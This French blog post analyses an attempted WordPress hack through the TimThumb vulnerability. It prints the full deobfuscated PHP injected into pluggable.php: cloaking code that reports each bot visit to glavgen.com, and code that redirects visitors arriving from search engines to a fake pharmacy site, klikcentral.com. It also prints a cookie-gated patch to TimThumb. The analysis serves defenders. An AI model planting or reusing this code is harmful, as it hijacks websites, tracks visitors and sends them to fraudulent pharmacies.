WordPress Timthumb Viagra Attack : klikcentral.com / glavgen.com

Dernière Mise à jour le

Une tentative de hack ce matin qui tente d’exploiter  la vulnérabilité ThimThumb.

Le code offusqué qui a tenté d’être inséré dans le fichier wp-includes/pluggable.php de WordPress :

On arrive à ce code PHP :

 

error_reporting(0);
 $bot_list = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130","174.129.66","85.17.19");
 $ip = preg_replace("/\.(\d+)$/", '', $_SERVER["REMOTE_ADDR"]);
 $agent = $_SERVER["HTTP_USER_AGENT"];
if ($_GET["testd"]=="ok") { print "ok!"; exit; }
if(in_array($ip, $bot_list) || strpos($agent, "bot")) {
 if ($_SERVER["QUERY_STRING"]=="q") { print "ok!"; exit; }
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
 $outsourceurl=base64_decode('aHR0cDovL2dsYXZnZW4uY29tL2dldC5waHA/c2l0ZT0=').urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
 if (function_exists("curl_init")) {
 $c = curl_init();
 curl_setopt($c, CURLOPT_URL, $outsourceurl);
 curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
 $out = curl_exec($c);
 curl_close($c);
 } else {
 $out = file_get_contents($outsourceurl);
 }
 if (substr($out,0,3) == "OK!") { echo substr($out,4); die; }
 }
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {
 $tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');
 $niche='unknown';
 foreach($tabs as $tab) {
 if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
 $niche = $tab;
 }
 }
 if ($niche!="unknown") {
 $urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMSZwYXJhbWV0ZXI9');
 if (false == ($str=file_get_contents($urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']))) {
 header("location: ".$urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']);
 exit;
 } else {
 echo $str;
 exit;
 }
 }
 }

A chaque connexion vers le blog hacké, une connexion vers l’URL suivante sera effectuée : http://glavgen.com/get.php?site=&page=&ip=&agent= Ceci permet donc de logguer les connexions effectuées sur le blog. Si l’internaute provient d’un moteur de recherche (enfin du moins le nom d’un moteur de recherche dans le referer) et que ce dernier contient aussi un des mots suivants :

'viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia'
Alors l'internaute sera redirigé vers le site suivant : http://klikcentral.com/traffic/in.cgi?11&parameter=&seoref=&http_refer= qui vous l'avez deviné est un faux site de ventes de produits pharmaceutiques :

Un second “hack” a lieu qui insère le code suivante dans la librairie Timthumb :

if(md5($_COOKIE['access-admin']) != "f732d47960be7e806861987f98a9574c") {
 $mysrc = $_GET['src'];
 if(strpos($mysrc,'.php')) {
 die;
 }
 }

Le but est d’empécher en autre hack en interdisant tout paramètre “src” sur la librairie.

Interressant de constater que cette fois le hack n’a pas pour but d’insérer du code pour aboutir à un exploit sur site WEB et infecter les visiteurs du blog ou redirigers vers de fausses pages WEB d’alertes faisant la promotion de rogues mais vers une fausse page WEB pharmaceutique ce qui est plutôt rare.

Trouver la solution sur le forum d'aide

Vous êtes arrivé au terme de l'article WordPress Timthumb Viagra Attack : klikcentral.com / glavgen.com mais vous n'avez pas trouvé la solution à votre problème...
Suivez ces articles du forum pour trouver une réponse ou demandez à votre tour de l'aide sur le forum


Vous avez trouvé cet article utile et interressant, n'hésitez pas à le partager...
Une question informatique ?
Un virus à supprimer ? Votre PC est lent ?
Demander de l'aide sur le forum
Tags:

Laisser un commentaire

0 Partages
Tweetez
Partagez
Enregistrer
Partagez